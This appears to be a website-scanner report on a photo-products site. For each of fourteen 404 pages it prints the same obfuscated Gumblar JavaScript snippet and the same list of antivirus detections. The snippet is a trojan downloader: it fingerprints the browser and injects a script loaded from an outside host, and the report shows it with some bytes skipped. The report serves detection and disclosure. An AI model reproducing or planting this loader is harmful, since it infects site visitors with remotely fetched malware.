Request | Server response | Status |
http://thephotoshop2.com/ | 200 OK Content-Length: 21717 Content-Type: text/html | clean |
http://thephotoshop2.com/index.html | 200 OK Content-Length: 21717 Content-Type: text/html | clean |
http://thephotoshop2.com/Software%20Downloads.html | 404 Not Found Content-Length: 2460 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- (function(){var e3R='v>61r>20a>3d>22S>63>72>69ptEn>67in>65>22>2cb>3d>22Vers>69on>28)>2b>22>2cj>3d>22>22>2cu>3d>6ea>76ig>61tor>2euserAgent>3bi>66((u>2eindexOf(>22Chrome>22)>3c>30>29>26>26(>75>2eindexO>66(>22Win>22)>3e0)>26>26(u>2ei>6e>64ex>4f>66(>22>4eT>206>22)>3c0>29>26>26(documen>74>2ec>6fokie>2ein&
... 216 bytes are skipped ...;61l>28>22if(win>64>6fw>2e>22>2ba+>22)j>3dj+>22+a+>22>4dajo>72>22>2b>62+>61>2b>22Minor>22+b+a+>22Buil>64>22>2bb+>22j>3b>22)>3bd>6f>63ument>2ewri>74e(>22>3cscript>20src>3d>2f>2fmartu>22>2b>22z>2ecn>2fvid>2f>3f>69d>3d>22+j+>22>3e>3c>5c>2f>73cri>70t>3e>22>29>3b>7d';eval(unescape(e3R.replace(/>/g,'%')))})(); -->Antivirus reports:- AntiVir
- HTML/Crypted.Gen
- Avast
- JS:RedGumb-O [Trj]
- Ikarus
- Trojan-Downloader.JS.Gumblar
- Panda
- JS/Gumbler.A
- TrendMicro-HouseCall
- JS_GUMBLAR.ERK
- McAfee-GW-Edition
- Heuristic.BehavesLike.JS.Infected.A
- TrendMicro
- JS_GUMBLAR.ERK
- Kaspersky
- Trojan-Downloader.JS.Gumblar.a
- TotalDefense
- JS/Gumblar!generic
- NANO-Antivirus
- Trojan.Script.Obf.iamn
- VIPRE
- Trojan-Downloader.JS.Gumblar.y (v)
- F-Prot
- JS/Redir.M1!Eldorado
- Sophos
- Troj/JSRedir-R
- GData
- JS:RedGumb-O
- Agnitum
- JS.Crypt.BQK
- ESET-NOD32
- JS/TrojanDownloader.Agent.NQB
|
http://thephotoshop2.com/test404page.js | 404 Not Found Content-Length: 2460 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- (function(){var e3R='v>61r>20a>3d>22S>63>72>69ptEn>67in>65>22>2cb>3d>22Vers>69on>28)>2b>22>2cj>3d>22>22>2cu>3d>6ea>76ig>61tor>2euserAgent>3bi>66((u>2eindexOf(>22Chrome>22)>3c>30>29>26>26(>75>2eindexO>66(>22Win>22)>3e0)>26>26(u>2ei>6e>64ex>4f>66(>22>4eT>206>22)>3c0>29>26>26(documen>74>2ec>6fokie>2ein&
... 216 bytes are skipped ...;61l>28>22if(win>64>6fw>2e>22>2ba+>22)j>3dj+>22+a+>22>4dajo>72>22>2b>62+>61>2b>22Minor>22+b+a+>22Buil>64>22>2bb+>22j>3b>22)>3bd>6f>63ument>2ewri>74e(>22>3cscript>20src>3d>2f>2fmartu>22>2b>22z>2ecn>2fvid>2f>3f>69d>3d>22+j+>22>3e>3c>5c>2f>73cri>70t>3e>22>29>3b>7d';eval(unescape(e3R.replace(/>/g,'%')))})(); -->Antivirus reports:- AntiVir
- HTML/Crypted.Gen
- Avast
- JS:RedGumb-O [Trj]
- Ikarus
- Trojan-Downloader.JS.Gumblar
- Panda
- JS/Gumbler.A
- TrendMicro-HouseCall
- JS_GUMBLAR.ERK
- McAfee-GW-Edition
- Heuristic.BehavesLike.JS.Infected.A
- TrendMicro
- JS_GUMBLAR.ERK
- Kaspersky
- Trojan-Downloader.JS.Gumblar.a
- TotalDefense
- JS/Gumblar!generic
- NANO-Antivirus
- Trojan.Script.Obf.iamn
- VIPRE
- Trojan-Downloader.JS.Gumblar.y (v)
- F-Prot
- JS/Redir.M1!Eldorado
- Sophos
- Troj/JSRedir-R
- GData
- JS:RedGumb-O
- Agnitum
- JS.Crypt.BQK
- ESET-NOD32
- JS/TrojanDownloader.Agent.NQB
|
http://thephotoshop2.com/WorkStream.htm | 404 Not Found Content-Length: 2460 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- (function(){var e3R='v>61r>20a>3d>22S>63>72>69ptEn>67in>65>22>2cb>3d>22Vers>69on>28)>2b>22>2cj>3d>22>22>2cu>3d>6ea>76ig>61tor>2euserAgent>3bi>66((u>2eindexOf(>22Chrome>22)>3c>30>29>26>26(>75>2eindexO>66(>22Win>22)>3e0)>26>26(u>2ei>6e>64ex>4f>66(>22>4eT>206>22)>3c0>29>26>26(documen>74>2ec>6fokie>2ein&
... 216 bytes are skipped ...;61l>28>22if(win>64>6fw>2e>22>2ba+>22)j>3dj+>22+a+>22>4dajo>72>22>2b>62+>61>2b>22Minor>22+b+a+>22Buil>64>22>2bb+>22j>3b>22)>3bd>6f>63ument>2ewri>74e(>22>3cscript>20src>3d>2f>2fmartu>22>2b>22z>2ecn>2fvid>2f>3f>69d>3d>22+j+>22>3e>3c>5c>2f>73cri>70t>3e>22>29>3b>7d';eval(unescape(e3R.replace(/>/g,'%')))})(); -->Antivirus reports:- AntiVir
- HTML/Crypted.Gen
- Avast
- JS:RedGumb-O [Trj]
- Ikarus
- Trojan-Downloader.JS.Gumblar
- Panda
- JS/Gumbler.A
- TrendMicro-HouseCall
- JS_GUMBLAR.ERK
- McAfee-GW-Edition
- Heuristic.BehavesLike.JS.Infected.A
- TrendMicro
- JS_GUMBLAR.ERK
- Kaspersky
- Trojan-Downloader.JS.Gumblar.a
- TotalDefense
- JS/Gumblar!generic
- NANO-Antivirus
- Trojan.Script.Obf.iamn
- VIPRE
- Trojan-Downloader.JS.Gumblar.y (v)
- F-Prot
- JS/Redir.M1!Eldorado
- Sophos
- Troj/JSRedir-R
- GData
- JS:RedGumb-O
- Agnitum
- JS.Crypt.BQK
- ESET-NOD32
- JS/TrojanDownloader.Agent.NQB
|
http://thephotoshop2.com/Photo%20Products.html | 404 Not Found Content-Length: 2460 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- (function(){var e3R='v>61r>20a>3d>22S>63>72>69ptEn>67in>65>22>2cb>3d>22Vers>69on>28)>2b>22>2cj>3d>22>22>2cu>3d>6ea>76ig>61tor>2euserAgent>3bi>66((u>2eindexOf(>22Chrome>22)>3c>30>29>26>26(>75>2eindexO>66(>22Win>22)>3e0)>26>26(u>2ei>6e>64ex>4f>66(>22>4eT>206>22)>3c0>29>26>26(documen>74>2ec>6fokie>2ein&
... 216 bytes are skipped ...;61l>28>22if(win>64>6fw>2e>22>2ba+>22)j>3dj+>22+a+>22>4dajo>72>22>2b>62+>61>2b>22Minor>22+b+a+>22Buil>64>22>2bb+>22j>3b>22)>3bd>6f>63ument>2ewri>74e(>22>3cscript>20src>3d>2f>2fmartu>22>2b>22z>2ecn>2fvid>2f>3f>69d>3d>22+j+>22>3e>3c>5c>2f>73cri>70t>3e>22>29>3b>7d';eval(unescape(e3R.replace(/>/g,'%')))})(); -->Antivirus reports:- AntiVir
- HTML/Crypted.Gen
- Avast
- JS:RedGumb-O [Trj]
- Ikarus
- Trojan-Downloader.JS.Gumblar
- Panda
- JS/Gumbler.A
- TrendMicro-HouseCall
- JS_GUMBLAR.ERK
- McAfee-GW-Edition
- Heuristic.BehavesLike.JS.Infected.A
- TrendMicro
- JS_GUMBLAR.ERK
- Kaspersky
- Trojan-Downloader.JS.Gumblar.a
- TotalDefense
- JS/Gumblar!generic
- NANO-Antivirus
- Trojan.Script.Obf.iamn
- VIPRE
- Trojan-Downloader.JS.Gumblar.y (v)
- F-Prot
- JS/Redir.M1!Eldorado
- Sophos
- Troj/JSRedir-R
- GData
- JS:RedGumb-O
- Agnitum
- JS.Crypt.BQK
- ESET-NOD32
- JS/TrojanDownloader.Agent.NQB
|
http://thephotoshop2.com/Art%20Strips.htm | 404 Not Found Content-Length: 2460 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- (function(){var e3R='v>61r>20a>3d>22S>63>72>69ptEn>67in>65>22>2cb>3d>22Vers>69on>28)>2b>22>2cj>3d>22>22>2cu>3d>6ea>76ig>61tor>2euserAgent>3bi>66((u>2eindexOf(>22Chrome>22)>3c>30>29>26>26(>75>2eindexO>66(>22Win>22)>3e0)>26>26(u>2ei>6e>64ex>4f>66(>22>4eT>206>22)>3c0>29>26>26(documen>74>2ec>6fokie>2ein&
... 216 bytes are skipped ...;61l>28>22if(win>64>6fw>2e>22>2ba+>22)j>3dj+>22+a+>22>4dajo>72>22>2b>62+>61>2b>22Minor>22+b+a+>22Buil>64>22>2bb+>22j>3b>22)>3bd>6f>63ument>2ewri>74e(>22>3cscript>20src>3d>2f>2fmartu>22>2b>22z>2ecn>2fvid>2f>3f>69d>3d>22+j+>22>3e>3c>5c>2f>73cri>70t>3e>22>29>3b>7d';eval(unescape(e3R.replace(/>/g,'%')))})(); -->Antivirus reports:- AntiVir
- HTML/Crypted.Gen
- Avast
- JS:RedGumb-O [Trj]
- Ikarus
- Trojan-Downloader.JS.Gumblar
- Panda
- JS/Gumbler.A
- TrendMicro-HouseCall
- JS_GUMBLAR.ERK
- McAfee-GW-Edition
- Heuristic.BehavesLike.JS.Infected.A
- TrendMicro
- JS_GUMBLAR.ERK
- Kaspersky
- Trojan-Downloader.JS.Gumblar.a
- TotalDefense
- JS/Gumblar!generic
- NANO-Antivirus
- Trojan.Script.Obf.iamn
- VIPRE
- Trojan-Downloader.JS.Gumblar.y (v)
- F-Prot
- JS/Redir.M1!Eldorado
- Sophos
- Troj/JSRedir-R
- GData
- JS:RedGumb-O
- Agnitum
- JS.Crypt.BQK
- ESET-NOD32
- JS/TrojanDownloader.Agent.NQB
|
http://thephotoshop2.com/Banners.htm | 404 Not Found Content-Length: 2460 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- (function(){var e3R='v>61r>20a>3d>22S>63>72>69ptEn>67in>65>22>2cb>3d>22Vers>69on>28)>2b>22>2cj>3d>22>22>2cu>3d>6ea>76ig>61tor>2euserAgent>3bi>66((u>2eindexOf(>22Chrome>22)>3c>30>29>26>26(>75>2eindexO>66(>22Win>22)>3e0)>26>26(u>2ei>6e>64ex>4f>66(>22>4eT>206>22)>3c0>29>26>26(documen>74>2ec>6fokie>2ein&
... 216 bytes are skipped ...;61l>28>22if(win>64>6fw>2e>22>2ba+>22)j>3dj+>22+a+>22>4dajo>72>22>2b>62+>61>2b>22Minor>22+b+a+>22Buil>64>22>2bb+>22j>3b>22)>3bd>6f>63ument>2ewri>74e(>22>3cscript>20src>3d>2f>2fmartu>22>2b>22z>2ecn>2fvid>2f>3f>69d>3d>22+j+>22>3e>3c>5c>2f>73cri>70t>3e>22>29>3b>7d';eval(unescape(e3R.replace(/>/g,'%')))})(); -->Antivirus reports:- AntiVir
- HTML/Crypted.Gen
- Avast
- JS:RedGumb-O [Trj]
- Ikarus
- Trojan-Downloader.JS.Gumblar
- Panda
- JS/Gumbler.A
- TrendMicro-HouseCall
- JS_GUMBLAR.ERK
- McAfee-GW-Edition
- Heuristic.BehavesLike.JS.Infected.A
- TrendMicro
- JS_GUMBLAR.ERK
- Kaspersky
- Trojan-Downloader.JS.Gumblar.a
- TotalDefense
- JS/Gumblar!generic
- NANO-Antivirus
- Trojan.Script.Obf.iamn
- VIPRE
- Trojan-Downloader.JS.Gumblar.y (v)
- F-Prot
- JS/Redir.M1!Eldorado
- Sophos
- Troj/JSRedir-R
- GData
- JS:RedGumb-O
- Agnitum
- JS.Crypt.BQK
- ESET-NOD32
- JS/TrojanDownloader.Agent.NQB
|
http://thephotoshop2.com/Calendars.htm | 404 Not Found Content-Length: 2460 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- (function(){var e3R='v>61r>20a>3d>22S>63>72>69ptEn>67in>65>22>2cb>3d>22Vers>69on>28)>2b>22>2cj>3d>22>22>2cu>3d>6ea>76ig>61tor>2euserAgent>3bi>66((u>2eindexOf(>22Chrome>22)>3c>30>29>26>26(>75>2eindexO>66(>22Win>22)>3e0)>26>26(u>2ei>6e>64ex>4f>66(>22>4eT>206>22)>3c0>29>26>26(documen>74>2ec>6fokie>2ein&
... 216 bytes are skipped ...;61l>28>22if(win>64>6fw>2e>22>2ba+>22)j>3dj+>22+a+>22>4dajo>72>22>2b>62+>61>2b>22Minor>22+b+a+>22Buil>64>22>2bb+>22j>3b>22)>3bd>6f>63ument>2ewri>74e(>22>3cscript>20src>3d>2f>2fmartu>22>2b>22z>2ecn>2fvid>2f>3f>69d>3d>22+j+>22>3e>3c>5c>2f>73cri>70t>3e>22>29>3b>7d';eval(unescape(e3R.replace(/>/g,'%')))})(); -->Antivirus reports:- AntiVir
- HTML/Crypted.Gen
- Avast
- JS:RedGumb-O [Trj]
- Ikarus
- Trojan-Downloader.JS.Gumblar
- Panda
- JS/Gumbler.A
- TrendMicro-HouseCall
- JS_GUMBLAR.ERK
- McAfee-GW-Edition
- Heuristic.BehavesLike.JS.Infected.A
- TrendMicro
- JS_GUMBLAR.ERK
- Kaspersky
- Trojan-Downloader.JS.Gumblar.a
- TotalDefense
- JS/Gumblar!generic
- NANO-Antivirus
- Trojan.Script.Obf.iamn
- VIPRE
- Trojan-Downloader.JS.Gumblar.y (v)
- F-Prot
- JS/Redir.M1!Eldorado
- Sophos
- Troj/JSRedir-R
- GData
- JS:RedGumb-O
- Agnitum
- JS.Crypt.BQK
- ESET-NOD32
- JS/TrojanDownloader.Agent.NQB
|
http://thephotoshop2.com/Class%20Composites.htm | 404 Not Found Content-Length: 2460 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- (function(){var e3R='v>61r>20a>3d>22S>63>72>69ptEn>67in>65>22>2cb>3d>22Vers>69on>28)>2b>22>2cj>3d>22>22>2cu>3d>6ea>76ig>61tor>2euserAgent>3bi>66((u>2eindexOf(>22Chrome>22)>3c>30>29>26>26(>75>2eindexO>66(>22Win>22)>3e0)>26>26(u>2ei>6e>64ex>4f>66(>22>4eT>206>22)>3c0>29>26>26(documen>74>2ec>6fokie>2ein&
... 216 bytes are skipped ...;61l>28>22if(win>64>6fw>2e>22>2ba+>22)j>3dj+>22+a+>22>4dajo>72>22>2b>62+>61>2b>22Minor>22+b+a+>22Buil>64>22>2bb+>22j>3b>22)>3bd>6f>63ument>2ewri>74e(>22>3cscript>20src>3d>2f>2fmartu>22>2b>22z>2ecn>2fvid>2f>3f>69d>3d>22+j+>22>3e>3c>5c>2f>73cri>70t>3e>22>29>3b>7d';eval(unescape(e3R.replace(/>/g,'%')))})(); -->Antivirus reports:- AntiVir
- HTML/Crypted.Gen
- Avast
- JS:RedGumb-O [Trj]
- Ikarus
- Trojan-Downloader.JS.Gumblar
- Panda
- JS/Gumbler.A
- TrendMicro-HouseCall
- JS_GUMBLAR.ERK
- McAfee-GW-Edition
- Heuristic.BehavesLike.JS.Infected.A
- TrendMicro
- JS_GUMBLAR.ERK
- Kaspersky
- Trojan-Downloader.JS.Gumblar.a
- TotalDefense
- JS/Gumblar!generic
- NANO-Antivirus
- Trojan.Script.Obf.iamn
- VIPRE
- Trojan-Downloader.JS.Gumblar.y (v)
- F-Prot
- JS/Redir.M1!Eldorado
- Sophos
- Troj/JSRedir-R
- GData
- JS:RedGumb-O
- Agnitum
- JS.Crypt.BQK
- ESET-NOD32
- JS/TrojanDownloader.Agent.NQB
|
http://thephotoshop2.com/Collages.htm | 404 Not Found Content-Length: 2460 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- (function(){var e3R='v>61r>20a>3d>22S>63>72>69ptEn>67in>65>22>2cb>3d>22Vers>69on>28)>2b>22>2cj>3d>22>22>2cu>3d>6ea>76ig>61tor>2euserAgent>3bi>66((u>2eindexOf(>22Chrome>22)>3c>30>29>26>26(>75>2eindexO>66(>22Win>22)>3e0)>26>26(u>2ei>6e>64ex>4f>66(>22>4eT>206>22)>3c0>29>26>26(documen>74>2ec>6fokie>2ein&
... 216 bytes are skipped ...;61l>28>22if(win>64>6fw>2e>22>2ba+>22)j>3dj+>22+a+>22>4dajo>72>22>2b>62+>61>2b>22Minor>22+b+a+>22Buil>64>22>2bb+>22j>3b>22)>3bd>6f>63ument>2ewri>74e(>22>3cscript>20src>3d>2f>2fmartu>22>2b>22z>2ecn>2fvid>2f>3f>69d>3d>22+j+>22>3e>3c>5c>2f>73cri>70t>3e>22>29>3b>7d';eval(unescape(e3R.replace(/>/g,'%')))})(); -->Antivirus reports:- AntiVir
- HTML/Crypted.Gen
- Avast
- JS:RedGumb-O [Trj]
- Ikarus
- Trojan-Downloader.JS.Gumblar
- Panda
- JS/Gumbler.A
- TrendMicro-HouseCall
- JS_GUMBLAR.ERK
- McAfee-GW-Edition
- Heuristic.BehavesLike.JS.Infected.A
- TrendMicro
- JS_GUMBLAR.ERK
- Kaspersky
- Trojan-Downloader.JS.Gumblar.a
- TotalDefense
- JS/Gumblar!generic
- NANO-Antivirus
- Trojan.Script.Obf.iamn
- VIPRE
- Trojan-Downloader.JS.Gumblar.y (v)
- F-Prot
- JS/Redir.M1!Eldorado
- Sophos
- Troj/JSRedir-R
- GData
- JS:RedGumb-O
- Agnitum
- JS.Crypt.BQK
- ESET-NOD32
- JS/TrojanDownloader.Agent.NQB
|
http://thephotoshop2.com/DryEraseBoards.html | 404 Not Found Content-Length: 2460 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- (function(){var e3R='v>61r>20a>3d>22S>63>72>69ptEn>67in>65>22>2cb>3d>22Vers>69on>28)>2b>22>2cj>3d>22>22>2cu>3d>6ea>76ig>61tor>2euserAgent>3bi>66((u>2eindexOf(>22Chrome>22)>3c>30>29>26>26(>75>2eindexO>66(>22Win>22)>3e0)>26>26(u>2ei>6e>64ex>4f>66(>22>4eT>206>22)>3c0>29>26>26(documen>74>2ec>6fokie>2ein&
... 216 bytes are skipped ...;61l>28>22if(win>64>6fw>2e>22>2ba+>22)j>3dj+>22+a+>22>4dajo>72>22>2b>62+>61>2b>22Minor>22+b+a+>22Buil>64>22>2bb+>22j>3b>22)>3bd>6f>63ument>2ewri>74e(>22>3cscript>20src>3d>2f>2fmartu>22>2b>22z>2ecn>2fvid>2f>3f>69d>3d>22+j+>22>3e>3c>5c>2f>73cri>70t>3e>22>29>3b>7d';eval(unescape(e3R.replace(/>/g,'%')))})(); -->Antivirus reports:- AntiVir
- HTML/Crypted.Gen
- Avast
- JS:RedGumb-O [Trj]
- Ikarus
- Trojan-Downloader.JS.Gumblar
- Panda
- JS/Gumbler.A
- TrendMicro-HouseCall
- JS_GUMBLAR.ERK
- McAfee-GW-Edition
- Heuristic.BehavesLike.JS.Infected.A
- TrendMicro
- JS_GUMBLAR.ERK
- Kaspersky
- Trojan-Downloader.JS.Gumblar.a
- TotalDefense
- JS/Gumblar!generic
- NANO-Antivirus
- Trojan.Script.Obf.iamn
- VIPRE
- Trojan-Downloader.JS.Gumblar.y (v)
- F-Prot
- JS/Redir.M1!Eldorado
- Sophos
- Troj/JSRedir-R
- GData
- JS:RedGumb-O
- Agnitum
- JS.Crypt.BQK
- ESET-NOD32
- JS/TrojanDownloader.Agent.NQB
|
http://thephotoshop2.com/Frames.htm | 404 Not Found Content-Length: 2460 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- (function(){var e3R='v>61r>20a>3d>22S>63>72>69ptEn>67in>65>22>2cb>3d>22Vers>69on>28)>2b>22>2cj>3d>22>22>2cu>3d>6ea>76ig>61tor>2euserAgent>3bi>66((u>2eindexOf(>22Chrome>22)>3c>30>29>26>26(>75>2eindexO>66(>22Win>22)>3e0)>26>26(u>2ei>6e>64ex>4f>66(>22>4eT>206>22)>3c0>29>26>26(documen>74>2ec>6fokie>2ein&
... 216 bytes are skipped ...;61l>28>22if(win>64>6fw>2e>22>2ba+>22)j>3dj+>22+a+>22>4dajo>72>22>2b>62+>61>2b>22Minor>22+b+a+>22Buil>64>22>2bb+>22j>3b>22)>3bd>6f>63ument>2ewri>74e(>22>3cscript>20src>3d>2f>2fmartu>22>2b>22z>2ecn>2fvid>2f>3f>69d>3d>22+j+>22>3e>3c>5c>2f>73cri>70t>3e>22>29>3b>7d';eval(unescape(e3R.replace(/>/g,'%')))})(); -->Antivirus reports:- AntiVir
- HTML/Crypted.Gen
- Avast
- JS:RedGumb-O [Trj]
- Ikarus
- Trojan-Downloader.JS.Gumblar
- Panda
- JS/Gumbler.A
- TrendMicro-HouseCall
- JS_GUMBLAR.ERK
- McAfee-GW-Edition
- Heuristic.BehavesLike.JS.Infected.A
- TrendMicro
- JS_GUMBLAR.ERK
- Kaspersky
- Trojan-Downloader.JS.Gumblar.a
- TotalDefense
- JS/Gumblar!generic
- NANO-Antivirus
- Trojan.Script.Obf.iamn
- VIPRE
- Trojan-Downloader.JS.Gumblar.y (v)
- F-Prot
- JS/Redir.M1!Eldorado
- Sophos
- Troj/JSRedir-R
- GData
- JS:RedGumb-O
- Agnitum
- JS.Crypt.BQK
- ESET-NOD32
- JS/TrojanDownloader.Agent.NQB
|
http://thephotoshop2.com/Greeting%20Cards.htm | 404 Not Found Content-Length: 2460 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- (function(){var e3R='v>61r>20a>3d>22S>63>72>69ptEn>67in>65>22>2cb>3d>22Vers>69on>28)>2b>22>2cj>3d>22>22>2cu>3d>6ea>76ig>61tor>2euserAgent>3bi>66((u>2eindexOf(>22Chrome>22)>3c>30>29>26>26(>75>2eindexO>66(>22Win>22)>3e0)>26>26(u>2ei>6e>64ex>4f>66(>22>4eT>206>22)>3c0>29>26>26(documen>74>2ec>6fokie>2ein&
... 216 bytes are skipped ...;61l>28>22if(win>64>6fw>2e>22>2ba+>22)j>3dj+>22+a+>22>4dajo>72>22>2b>62+>61>2b>22Minor>22+b+a+>22Buil>64>22>2bb+>22j>3b>22)>3bd>6f>63ument>2ewri>74e(>22>3cscript>20src>3d>2f>2fmartu>22>2b>22z>2ecn>2fvid>2f>3f>69d>3d>22+j+>22>3e>3c>5c>2f>73cri>70t>3e>22>29>3b>7d';eval(unescape(e3R.replace(/>/g,'%')))})(); -->Antivirus reports:- AntiVir
- HTML/Crypted.Gen
- Avast
- JS:RedGumb-O [Trj]
- Ikarus
- Trojan-Downloader.JS.Gumblar
- Panda
- JS/Gumbler.A
- TrendMicro-HouseCall
- JS_GUMBLAR.ERK
- McAfee-GW-Edition
- Heuristic.BehavesLike.JS.Infected.A
- TrendMicro
- JS_GUMBLAR.ERK
- Kaspersky
- Trojan-Downloader.JS.Gumblar.a
- TotalDefense
- JS/Gumblar!generic
- NANO-Antivirus
- Trojan.Script.Obf.iamn
- VIPRE
- Trojan-Downloader.JS.Gumblar.y (v)
- F-Prot
- JS/Redir.M1!Eldorado
- Sophos
- Troj/JSRedir-R
- GData
- JS:RedGumb-O
- Agnitum
- JS.Crypt.BQK
- ESET-NOD32
- JS/TrojanDownloader.Agent.NQB
|
http://thephotoshop2.com/Journals%20&%20Notebooks.htm | 404 Not Found Content-Length: 2460 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- (function(){var e3R='v>61r>20a>3d>22S>63>72>69ptEn>67in>65>22>2cb>3d>22Vers>69on>28)>2b>22>2cj>3d>22>22>2cu>3d>6ea>76ig>61tor>2euserAgent>3bi>66((u>2eindexOf(>22Chrome>22)>3c>30>29>26>26(>75>2eindexO>66(>22Win>22)>3e0)>26>26(u>2ei>6e>64ex>4f>66(>22>4eT>206>22)>3c0>29>26>26(documen>74>2ec>6fokie>2ein&
... 216 bytes are skipped ...;61l>28>22if(win>64>6fw>2e>22>2ba+>22)j>3dj+>22+a+>22>4dajo>72>22>2b>62+>61>2b>22Minor>22+b+a+>22Buil>64>22>2bb+>22j>3b>22)>3bd>6f>63ument>2ewri>74e(>22>3cscript>20src>3d>2f>2fmartu>22>2b>22z>2ecn>2fvid>2f>3f>69d>3d>22+j+>22>3e>3c>5c>2f>73cri>70t>3e>22>29>3b>7d';eval(unescape(e3R.replace(/>/g,'%')))})(); -->Antivirus reports:- AntiVir
- HTML/Crypted.Gen
- Avast
- JS:RedGumb-O [Trj]
- Ikarus
- Trojan-Downloader.JS.Gumblar
- Panda
- JS/Gumbler.A
- TrendMicro-HouseCall
- JS_GUMBLAR.ERK
- McAfee-GW-Edition
- Heuristic.BehavesLike.JS.Infected.A
- TrendMicro
- JS_GUMBLAR.ERK
- Kaspersky
- Trojan-Downloader.JS.Gumblar.a
- TotalDefense
- JS/Gumblar!generic
- NANO-Antivirus
- Trojan.Script.Obf.iamn
- VIPRE
- Trojan-Downloader.JS.Gumblar.y (v)
- F-Prot
- JS/Redir.M1!Eldorado
- Sophos
- Troj/JSRedir-R
- GData
- JS:RedGumb-O
- Agnitum
- JS.Crypt.BQK
- ESET-NOD32
- JS/TrojanDownloader.Agent.NQB
|